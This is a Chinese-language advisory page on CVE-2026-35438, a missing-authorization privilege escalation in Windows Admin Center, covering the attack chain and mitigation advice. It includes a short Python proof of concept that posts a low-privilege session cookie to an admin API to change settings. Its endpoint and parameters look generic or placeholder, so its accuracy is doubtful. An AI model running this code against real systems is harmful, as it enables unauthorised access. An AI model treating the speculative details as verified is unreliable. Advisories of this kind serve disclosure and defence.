CVE-2026-35438 CVSS 8.3 高危

CVE-2026-35438 Windows Admin Center权限提升漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35438

漏洞类型

权限提升

CVSS评分

8.3 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Windows Admin Center

漏洞概述

CVE-2026-35438 是 Windows Admin Center 中发现的一个高危安全漏洞。由于系统在处理特定操作时缺少必要的授权验证机制，已获得低权限访问的攻击者可以通过网络发送特制请求。成功利用该漏洞可能导致攻击者在系统中提升权限，从而对机密性、完整性和可用性造成严重影响。

技术细节

该漏洞的核心在于 Windows Admin Center 未对关键 API 接口实施严格的权限检查。攻击者首先需要具备网络访问权限（AV:N）和低级别的账户权限（PR:L）。利用过程中，攻击者无需诱导用户交互（UI:N），直接向存在缺陷的管理接口发送恶意 HTTP 请求。由于授权逻辑缺失，系统错误地处理了请求，允许低权限用户执行高权限操作。这可能导致攻击者读取敏感配置、修改系统设置或导致服务中断，CVSS 评分高达 8.3。

攻击链分析

STEP 1

1. 获取访问

攻击者获取 Windows Admin Center 的低权限账户访问权限或网络访问能力。

STEP 2

2. 发送恶意请求

攻击者向缺少授权检查的 API 端点发送特制的网络请求包。

STEP 3

3. 权限提升

由于系统未验证操作权限，攻击者成功执行高权限操作，实现权限提升。

STEP 4

4. 系统控制

攻击者利用提升的权限窃取数据（C:L）、破坏系统完整性（I:H）或中断服务（A:H）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-35438: Missing Authorization in Windows Admin Center
# This script attempts to perform a privileged action using a low-privilege token.

target = "https://<windows-admin-center-url>/api/management/sensitive/action"
headers = {
    "Content-Type": "application/json",
    "Cookie": "PD-SessionId=<low_privilege_session_cookie>"
}
data = {
    "operation": "update_admin_settings",
    "value": "malicious_config"
}

response = requests.post(target, json=data, headers=headers, verify=False)

if response.status_code == 200:
    print("[+] Exploit successful: Authorization bypass confirmed.")
else:
    print(f"[-] Exploit failed. Status code: {response.status_code}")

影响范围

Windows Admin Center (具体受影响版本请参考官方公告)

防御指南

临时缓解措施

在应用补丁之前，建议将 Windows Admin Center 部署在隔离的网络环境中，并启用防火墙规则限制入站连接。同时，应定期审查系统日志，监控是否有异常的权限提升尝试或未授权的管理操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表